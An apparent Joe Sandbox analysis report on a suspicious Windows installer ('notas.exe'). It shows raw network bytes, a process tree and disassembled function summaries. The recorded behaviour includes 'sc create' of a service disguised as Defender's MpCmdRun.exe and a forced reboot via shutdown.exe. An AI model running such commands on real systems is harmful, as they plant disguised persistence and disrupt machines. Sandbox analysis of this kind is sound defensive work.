Dc{mG#TY{M C_A62A^<]1sL#2FP>!@y\B>e^Ju`}PKs0FNnn\|\bj!XWa3/s)w8R #{{_}3%);M^THs9srNQS-xl\|z$Zq
2024-02-23 14:34:01 UTC	2800	IN	Data Raw: f9 b0 4d e5 28 a6 3d a2 f4 95 41 6e e3 33 6c 7a 25 52 a5 7d 5c 2b 02 a6 5f d6 e9 47 7e a3 e9 35 42 ac 16 60 2b 9a 98 6f 4b 84 62 cd 00 61 b1 57 2d d0 0f 0c 4b 5c 60 c7 41 c8 7a 17 0d 83 ba 9f 5a 84 ff 1c 3e e4 a8 c0 61 3c 5f b8 5f 77 14 86 38 f4 3a 64 3d eb c8 18 bb e1 84 b9 6e 05 f1 ff 4b 2f 88 0f 65 be 10 ff 1a 83 04 9c 36 62 0e 1c 2f 80 75 78 94 de e6 15 60 92 6f 1c 11 f0 04 48 9e e7 05 cf 8c b7 6d eb 56 a8 cc 05 fe f9 f9 a5 b9 1f 21 00 34 00 01 f3 68 06 29 d4 0f 4f 01 81 f0 66 ee 0a 1b 97 47 98 e2 23 bb c1 9b bc b2 ae 3e 28 00 da 73 16 10 0f 5d 99 d6 6e bf c6 19 f3 27 bc 1a 26 84 a8 49 d4 d8 34 b3 3f e2 3f 73 5a e8 54 54 d8 09 e0 fb 4a 95 54 e5 8a 70 94 40 81 c7 3b 7d 33 af 7c 11 ba a5 a7 ff 38 2c a1 64 d7 06 46 fd 64 fe 81 44 39 80 d0 2e bc ee 6b 0a Data Ascii: M(=An3lz%R}\+_G~5B`+oKbaW-K\`AzZ>a<__w8:d=nK/e6b/ux`oHmV!4h)OfG#>(s]n'&I4??sZTTJTp@;}3\|8,dFdD9.k
2024-02-23 14:34:01 UTC	16384	IN	Data Raw: cd 09 99 74 be 32 42 55 67 c2 c0 06 31 7c cc cc ee 08 5a 0d 96 ab 4b d3 5e ed bc 9f 71 96 55 ed 53 0c 4b 80 4c 08 6b 8d 97 69 67 1c d0 14 4b 3c 12 b8 49 f5 d9 00 ec 2b 63 b8 78 43 fb 6d 6e 34 cb 15 0e 27 90 36 ba 70 80 0d 2e 09 4f 4a 78 9e 8b 82 28 49 a4 4d c2 48 5c d8 da ae 29 16 67 fd ad a8 ab 6b de ad dc cf 68 ce 53 27 2c 8c f7 16 d2 28 44 fc a7 da 11 68 ef 6b 38 3e 51 ba f3 f7 1c 15 30 14 36 c8 f3 7a 70 de 02 ae 00 56 63 55 ac ea 68 b0 ee 50 ed 38 d3 ac b0 7e 09 75 e2 bd c8 8d 53 25 5a bc 47 bd 1e ed dc 6e 53 2c e1 9f 5c d2 78 96 8f 27 c1 1b 5b 8e 61 8d fa cb 9d 06 94 07 14 85 fb f8 d0 06 6d 09 b5 be e6 cc 94 66 b5 75 9a ce 1f ca 01 f6 f1 68 bd d4 57 7d 39 53 4f 4e 8f a8 35 aa 7c 04 de 0c ca ff b3 06 80 7d eb c8 b7 c3 89 7a a5 27 99 6c 97 97 d6 ad 3e Data Ascii: t2BUg1\|ZK^qUSKLkigK<I+cxCmn4'6p.OJx(IMH\)gkhS',(Dhk8>Q06zpVcUhP8~uS%ZGnS,\x'[amfuhW}9SON5\|}z'l>
2024-02-23 14:34:01 UTC	1024	IN	Data Raw: 40 28 3c 10 af e3 14 ce b3 fb 89 0f b4 e7 4c e2 1a fd dc 8e c4 9c 9e 65 7d 51 2d f7 1b c3 9a 3b 8d 4d 49 c9 cd ac 8d d4 35 99 7e af 46 39 97 cc ee ca 26 3f ac a4 86 ca e0 f3 a1 9a 03 93 af 42 9b df 6e 7c ad 1c 17 b2 3e 20 35 31 09 d9 48 97 1e 6f 6f 4f cc 4b c9 cf 74 8b 6a cb c1 73 05 87 f3 7a c6 ea 70 9d c6 9b 9c ea 55 28 68 e5 42 73 1a 71 a4 7e 8a 43 5a 66 b5 32 0d 2c b3 73 a6 ee 55 8f 03 8d 29 49 71 56 9d f8 1c 2d 5b f7 a4 b1 41 3a da c5 e6 fe 8b 7c f9 6c 2b 20 70 a4 33 5e db c8 03 e3 05 82 a3 0f 59 ea 03 99 5b 3e e5 5e 23 59 9e 5b be 41 2f 4e f6 35 41 ea d9 7a a2 e5 3c 70 cc 62 a4 03 a4 84 ca 85 6c 7b d6 3e d6 9c e6 ac 04 99 6e d4 f6 27 b9 7d 18 2d ef a0 22 ea a8 d2 76 c5 8b 0f 87 43 5d fa ac eb 79 a4 09 b4 d3 32 3d 68 da dd 10 7d a1 0a dc ee 3c 15 aa Data Ascii: @(<Le}Q-;MI5~F9&?Bn\|> 51HooOKtjszpU(hBsq~CZf2,sU)IqV-[A:\|l+ p3^Y[>^#Y[A/N5Az<pbl{>n'}-"vC]y2=h}<
2024-02-23 14:34:01 UTC	16384	IN	Data Raw: e0 e2 35 58 d6 b8 9e 2a 2a 80 1a 24 56 c6 d9 78 9c 22 eb b7 c3 37 e5 c4 bb 0b ca f5 48 7e 2d 72 b5 08 1c 3e bf 65 f1 8e e6 e7 bd 44 ee ca 39 ab e7 3e 4f 89 a7 d0 2b 1c ed dc d2 2d f5 e9 fe ad 35 5b 56 9f 6b 46 82 29 60 56 5f 47 ca 7f 3a 82 d4 4c 1e 0c 75 25 6c 78 67 5e 0d 86 b8 21 f8 d4 4f d8 a5 f1 a7 d4 d5 f8 33 fc 38 66 92 f9 4b bd de 73 77 d8 41 76 c0 8a f2 74 32 b3 2e f6 77 72 a0 6a 13 d6 70 4e 4a c6 92 55 d1 5a f0 ac 36 f6 55 11 f6 7c 7c 07 1b 2e 29 65 6a 15 e7 60 ee 27 27 58 21 0e 52 6a 52 72 c7 93 dd 1e a7 bc a4 15 7c a4 f6 69 d8 6f da 3e c3 c1 a8 c6 13 58 1e b6 ef 2c d3 9f 4e 00 28 13 49 e8 56 6c 0f 39 29 88 5f e0 9e 99 09 40 87 79 36 c9 df 98 ac 7a b1 0e 72 49 1a 1a 6d d6 31 ed 9f 56 a3 4f 69 f6 15 83 46 6b 17 d2 d2 37 dd e8 50 1c ea 0e cc c3 09 Data Ascii: 5X**$Vx"7H~-r>eD9>O+-5[VkF)`V_G:Lu%lxg^!O38fKswAvt2.wrjpNJUZ6U\|\|.)ej`''X!RjRr\|io>X,N(IVl9)_@y6zrIm1VOiFk7P
2024-02-23 14:34:01 UTC	1024	IN	Data Raw: b6 eb 31 21 bf bd 35 a2 94 74 fc d9 96 c8 20 e4 54 03 eb 55 f1 0d 89 51 e2 15 cd 8d 3c b2 e0 3c 1a 7c 28 80 e2 20 c6 97 eb 5b be 7e 72 13 09 65 74 0b 68 d1 87 84 48 d3 e7 d6 3d 91 6c a8 6b 61 0a 58 81 2f 16 99 f4 20 43 f9 da 58 e1 5e 68 43 b5 4e 17 3a d2 53 a1 31 7a df fd 60 19 fe 2e 7e 90 2f a9 be 06 a1 01 3d a0 b3 16 75 6a 0f d1 65 4b bf 46 44 29 67 9b 55 1d 9c 72 c0 82 dd df aa 7e 1d ea a1 12 8c ce a7 a4 8a 08 f2 25 e6 21 c0 a5 d7 ac 60 e8 7c 95 29 a5 5e 1b 42 a0 95 69 23 b1 ad 41 e4 44 a0 b0 3a 73 5e 17 1c d6 ad 61 8f 3d 0f 47 e2 04 da d0 76 b2 d9 f9 5b 81 96 12 23 15 7f b0 15 06 fd 80 89 d0 39 2b ca be 6d f8 e4 f4 25 15 e1 f7 c4 06 d5 68 e9 b5 2b f7 15 35 ed 3a 2e bb 65 4c 3d b0 a6 8a 79 95 04 a4 95 7c 25 9b d1 02 89 0e c4 4a 7d 76 9a ad b6 6b 32 45 Data Ascii: 1!5t TUQ<<\|( [~rethH=lkaX/ CX^hCN:S1z`.~/=ujeKFD)gUr~%!`\|)^Bi#AD:s^a=Gv[#9+m%h+5:.eL=y\|%J}vk2E

Target ID:	0
Start time:	15:33:54
Start date:	23/02/2024
Path:	C:\Users\user\Desktop\0219830219301290321012notas.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\0219830219301290321012notas.exe
Imagebase:	0xd40000
File size:	2'102'272 bytes
MD5 hash:	A548469585481A1B7F98C9B09D271349
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	15:33:54
Start date:	23/02/2024
Path:	C:\Users\user\Desktop\0219830219301290321012notas.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\0219830219301290321012notas.exe" --rerunningWithoutUAC
Imagebase:	0xd40000
File size:	2'102'272 bytes
MD5 hash:	A548469585481A1B7F98C9B09D271349
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	15:33:54
Start date:	23/02/2024
Path:	C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\SquirrelTemp\Update.exe" --install . --rerunningWithoutUAC
Imagebase:	0x330000
File size:	1'899'520 bytes
MD5 hash:	A560BAD9E373EA5223792D60BEDE2B13
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe, Author: Joe Security
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	15:33:57
Start date:	23/02/2024
Path:	C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe" --squirrel-firstrun
Imagebase:	0x6c0000
File size:	22'216 bytes
MD5 hash:	CC09BB7FDEFC5763CCB3CF7DAE2D76CF
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	15:33:58
Start date:	23/02/2024
Path:	C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe"
Imagebase:	0x6c0000
File size:	22'216 bytes
MD5 hash:	CC09BB7FDEFC5763CCB3CF7DAE2D76CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	15:34:05
Start date:	23/02/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /C sc create WdCmdSvc binPath= "C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exe" start= auto
Imagebase:	0xa40000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	15:34:05
Start date:	23/02/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	15:34:06
Start date:	23/02/2024
Path:	C:\Windows\SysWOW64\shutdown.exe
Wow64 process (32bit):	true
Commandline:	C:\WINDOWS\system32\shutdown.exe -r -t 1 -f
Imagebase:	0x4c0000
File size:	23'552 bytes
MD5 hash:	FCDE5AF99B82AE6137FB90C7571D40C3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	15:34:06
Start date:	23/02/2024
Path:	C:\Windows\SysWOW64\sc.exe
Wow64 process (32bit):	true
Commandline:	sc create WdCmdSvc binPath= "C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exe" start= auto
Imagebase:	0xe20000
File size:	61'440 bytes
MD5 hash:	D9D7684B8431A0D10D0E76FE9F5FFEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	15:34:06
Start date:	23/02/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	3.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	5.9%
Total number of Nodes:	1558
Total number of Limit Nodes:	34

Executed Functions

Function 00D47326 Relevance: 29.9, APIs: 7, Strings: 10, Instructions: 168
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetDefaultDllDirectories.KERNEL32(00000800), ref: 00D4734F
LoadLibraryW.KERNEL32(kernel32.dll), ref: 00D4735A
GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00D47366
CoInitialize.OLE32(00000000), ref: 00D473CD
InitCommonControlsEx.COMCTL32(?), ref: 00D473EE

Part of subcall function 00D42304: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003), ref: 00D42373
Part of subcall function 00D42304: VerSetConditionMask.KERNEL32(00000000), ref: 00D42377
Part of subcall function 00D42304: VerSetConditionMask.KERNEL32(00000000), ref: 00D4237B
Part of subcall function 00D42304: VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 00D4239E

GetModuleHandleW.KERNEL32(00000000,?,--rerunningWithoutUAC,?,00D66FB0), ref: 00D47506
GetModuleFileNameW.KERNEL32(00000000,?,00001000), ref: 00D47519

Strings

Failed to install the .NET Framework, try installing the latest version manually, xrefs: 00D474D3
--rerunningWithoutUAC, xrefs: 00D47445
Incompatible Operating System, xrefs: 00D4749D
SetDefaultDllDirectories, xrefs: 00D47360
--rerunningWithoutUAC, xrefs: 00D47536
Please re-run this installer as a normal user instead of "Run as Administrator"., xrefs: 00D47463
kernel32.dll, xrefs: 00D47355
--checkInstall, xrefs: 00D4738C
This program cannot run on Windows XP or before; it requires a later version of Windows., xrefs: 00D474A2
--silent, xrefs: 00D473BF

Memory Dump Source

Source File: 00000000.00000002.1352193890.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.1352176837.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352220255.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352242403.0000000000D6A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352261762.0000000000D6C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_0219830219301290321012notas.jbxd

Similarity

API ID: ConditionMask$Module$AddressCommonControlsDefaultDirectoriesFileHandleInfoInitInitializeLibraryLoadNameProcVerifyVersion
String ID: --rerunningWithoutUAC$ --silent$--checkInstall$--rerunningWithoutUAC$Failed to install the .NET Framework, try installing the latest version manually$Incompatible Operating System$Please re-run this installer as a normal user instead of "Run as Administrator".$SetDefaultDllDirectories$This program cannot run on Windows XP or before; it requires a later version of Windows.$kernel32.dll
API String ID: 365319271-1442077338
Opcode ID: 8f2d68433edf94073d2918ba8efa57610de21493bb2ddec0b7a0356d7a375da0
Instruction ID: c9333332782d5a953c2043a7f40e08b37704aae3a360447772dd3c3a55cb51b6
Opcode Fuzzy Hash: 8f2d68433edf94073d2918ba8efa57610de21493bb2ddec0b7a0356d7a375da0
Instruction Fuzzy Hash: 9E51F835A043145BDB20BB74DC9AAAEB764EF40304F0844A4F94AA7283DF749E89CA75

Uniqueness

Uniqueness Score: -1.00%

Function 00D51584 Relevance: 4.5, APIs: 3, Instructions: 20
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(?,?,00D51583,?,?,?,?), ref: 00D515A6
TerminateProcess.KERNEL32(00000000,?,00D51583,?,?,?,?), ref: 00D515AD
ExitProcess.KERNEL32 ref: 00D515BF

Memory Dump Source

Source File: 00000000.00000002.1352193890.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.1352176837.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352220255.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352242403.0000000000D6A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352261762.0000000000D6C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_0219830219301290321012notas.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: afa044cd784c79d660dfb96daef91b280bea6c41c3f86bcad24b91293aceeb4c
Instruction ID: 9f507edf1a3b49afd8d4953f0aa3cde816a1b275698bf24b32054583972b943c
Opcode Fuzzy Hash: afa044cd784c79d660dfb96daef91b280bea6c41c3f86bcad24b91293aceeb4c
Instruction Fuzzy Hash: CAE09235000608ABCF526B58DA09A593BA9EB94342B044424FE06DA222DA35DA99CAA0

Uniqueness

Uniqueness Score: -1.00%

Function 00D471EF Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 69
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3_GS.LIBCMT ref: 00D471F9
GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00D4720A
LoadLibraryW.KERNELBASE(?), ref: 00D472CF
LoadLibraryW.KERNELBASE(?), ref: 00D472E6
LoadLibraryW.KERNELBASE(?), ref: 00D472FD

Strings

\sspicli.dll, xrefs: 00D47292
\logoncli.dll, xrefs: 00D4725A
\version.dll, xrefs: 00D4722C

Memory Dump Source

Source File: 00000000.00000002.1352193890.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.1352176837.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352220255.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352242403.0000000000D6A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352261762.0000000000D6C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_0219830219301290321012notas.jbxd

Similarity

API ID: LibraryLoad$DirectoryH_prolog3_System
String ID: \logoncli.dll$\sspicli.dll$\version.dll
API String ID: 204495113-3953914256
Opcode ID: 684ae972cf34ff7bece89b0cf3d797c9dfd3be7d03e0634f14f6709d3e34972e
Instruction ID: b6fd854043fd758ea1e97749a12438828ba91923341422ea3a18c49f02025116
Opcode Fuzzy Hash: 684ae972cf34ff7bece89b0cf3d797c9dfd3be7d03e0634f14f6709d3e34972e
Instruction Fuzzy Hash: 7331163195912C9BCB60EB64CC9DADDB3B9EF24305F5001E9A409A6092EF349B89CF70

Uniqueness

Uniqueness Score: -1.00%

Function 00D462D8 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00D462E9
OpenProcessToken.ADVAPI32(00000000,00000008,00000000), ref: 00D462FA
GetLastError.KERNEL32 ref: 00D46304
GetTokenInformation.KERNELBASE(00000000,00000012(TokenIntegrityLevel),?,00000004,?), ref: 00D46329
CloseHandle.KERNEL32(00000000), ref: 00D46345

Strings

.Wup1Wu, xrefs: 00D46345

Memory Dump Source

Source File: 00000000.00000002.1352193890.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.1352176837.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352220255.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352242403.0000000000D6A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352261762.0000000000D6C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_0219830219301290321012notas.jbxd

Similarity

API ID: ProcessToken$CloseCurrentErrorHandleInformationLastOpen
String ID: .Wup1Wu
API String ID: 2078281146-3681912474
Opcode ID: e2fb45144c11222a7927b40196563094222db4732561ed269bb997e3a380cdc7
Instruction ID: b7452ddcb8dc27bf56706a836642ff71e71c3a5e2e7f5c90cdbad4c807fb39b6
Opcode Fuzzy Hash: e2fb45144c11222a7927b40196563094222db4732561ed269bb997e3a380cdc7
Instruction Fuzzy Hash: EA015E34A00319AFDB009FA8CD8DBBEB7B8FB04706F444468E902E6191DBB49948DA71

Uniqueness

Uniqueness Score: -1.00%

Function 00D4660B Relevance: 9.1, APIs: 6, Instructions: 90
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

IUnknown_QueryInterface_Proxy.RPCRT4(?,00D66ED8,?), ref: 00D46617
SysFreeString.OLEAUT32(?), ref: 00D4667D
VariantClear.OLEAUT32(?), ref: 00D466A1
VariantClear.OLEAUT32(?), ref: 00D466AA
VariantClear.OLEAUT32(?), ref: 00D466B3
VariantClear.OLEAUT32(?), ref: 00D466B9

Memory Dump Source

Source File: 00000000.00000002.1352193890.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.1352176837.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352220255.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352242403.0000000000D6A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352261762.0000000000D6C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_0219830219301290321012notas.jbxd

Similarity

API ID: ClearVariant$FreeInterface_ProxyQueryStringUnknown_
String ID:
API String ID: 3803624483-0
Opcode ID: 3317203ee6ae484624ad1058d6b1247490945ff2b78483a9f24e00ca91944f51
Instruction ID: 7eae1f245ab4b15626155855d9e36219503c3f6cdfb7ddbef96e168692195b61
Opcode Fuzzy Hash: 3317203ee6ae484624ad1058d6b1247490945ff2b78483a9f24e00ca91944f51
Instruction Fuzzy Hash: 21313E72D006199FDF01EFB8C80469FBBBAAF4A300F154489E805FB240CA769A05CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00D4635A Relevance: 7.6, APIs: 5, Instructions: 141
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3_GS.LIBCMT ref: 00D46361
VariantInit.OLEAUT32(?), ref: 00D4639E
IUnknown_QueryInterface_Proxy.RPCRT4(?,00D66EC8,?), ref: 00D463F1
VariantClear.OLEAUT32(?), ref: 00D4649C
VariantClear.OLEAUT32(?), ref: 00D464A2

Memory Dump Source

Source File: 00000000.00000002.1352193890.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.1352176837.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352220255.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352242403.0000000000D6A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352261762.0000000000D6C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_0219830219301290321012notas.jbxd

Similarity

API ID: Variant$Clear$H_prolog3_InitInterface_ProxyQueryUnknown_
String ID:
API String ID: 1900967701-0
Opcode ID: 266ce685b4b357adac02e617b63ae4d00aef228769fa045a2d279c17b8d9552a
Instruction ID: 0f50ff46cc3677da2eaad19bbbe7a2af0a7815c5a5b1a5be81e706d8530de1f6
Opcode Fuzzy Hash: 266ce685b4b357adac02e617b63ae4d00aef228769fa045a2d279c17b8d9552a
Instruction Fuzzy Hash: C95120B5A00209AFDF00CFE4C984AAEBBB9AF89705F148459E505EB350DB75DE05CB71

Uniqueness

Uniqueness Score: -1.00%

Function 00D4AA90 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 50
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___scrt_is_nonwritable_in_current_image.LIBCMT ref: 00D4AAAC
___scrt_uninitialize_crt.LIBCMT ref: 00D4AAEF

Strings

PWh, xrefs: 00D4AACC
Mk, xrefs: 00D4AAE7

Memory Dump Source

Source File: 00000000.00000002.1352193890.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.1352176837.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352220255.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352242403.0000000000D6A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352261762.0000000000D6C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_0219830219301290321012notas.jbxd

Similarity

API ID: ___scrt_is_nonwritable_in_current_image___scrt_uninitialize_crt
String ID: PWh$Mk
API String ID: 2554503057-1383596220
Opcode ID: b3dd89f1dba91de307fd0dc7638cbf846a0b3ee90b0bcda518185ea3bc7c82dd
Instruction ID: 6160d912543e04a8b54596612f809c65057d553a3bdc3c5215067e22ff97514f
Opcode Fuzzy Hash: b3dd89f1dba91de307fd0dc7638cbf846a0b3ee90b0bcda518185ea3bc7c82dd
Instruction Fuzzy Hash: 3FF0F9365C47109BCA307B686917A2EA765DF81721F14055AFC816B1D1DE254C4586B2

Uniqueness

Uniqueness Score: -1.00%

Function 00D4115F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryValueExW.KERNELBASE(?,Release,00000000,?,?,?,80000002,SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full,00020019), ref: 00D411B8

Strings

Release, xrefs: 00D411B0
SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full, xrefs: 00D4117A

Memory Dump Source

Source File: 00000000.00000002.1352193890.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.1352176837.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352220255.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352242403.0000000000D6A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352261762.0000000000D6C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_0219830219301290321012notas.jbxd

Similarity

API ID: QueryValue
String ID: Release$SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full
API String ID: 3660427363-1765340461
Opcode ID: 00427daa0663dcadd0135f9040ba2681f3f7e399551b0ce54589689161bfd243
Instruction ID: 2189cb47927e1aa10da836575e6e3bf36f07c9c1a6e77fab2ffea661e40324a1
Opcode Fuzzy Hash: 00427daa0663dcadd0135f9040ba2681f3f7e399551b0ce54589689161bfd243
Instruction Fuzzy Hash: 5C113C78E0034DAFDB00DF99DC81AEEB7B8EB05354F00446EE901A2240EA70AA45CB75

Uniqueness

Uniqueness Score: -1.00%

Function 00D464BD Relevance: 3.0, APIs: 2, Instructions: 49
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3_GS.LIBCMT ref: 00D464C4

Part of subcall function 00D4635A: __EH_prolog3_GS.LIBCMT ref: 00D46361
Part of subcall function 00D4635A: VariantInit.OLEAUT32(?), ref: 00D4639E
Part of subcall function 00D4635A: IUnknown_QueryInterface_Proxy.RPCRT4(?,00D66EC8,?), ref: 00D463F1

IUnknown_QueryInterface_Proxy.RPCRT4(?,00D66EE8), ref: 00D4650D

Memory Dump Source

Source File: 00000000.00000002.1352193890.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.1352176837.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352220255.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352242403.0000000000D6A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352261762.0000000000D6C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_0219830219301290321012notas.jbxd

Similarity

API ID: H_prolog3_Interface_ProxyQueryUnknown_$InitVariant
String ID:
API String ID: 2261498493-0
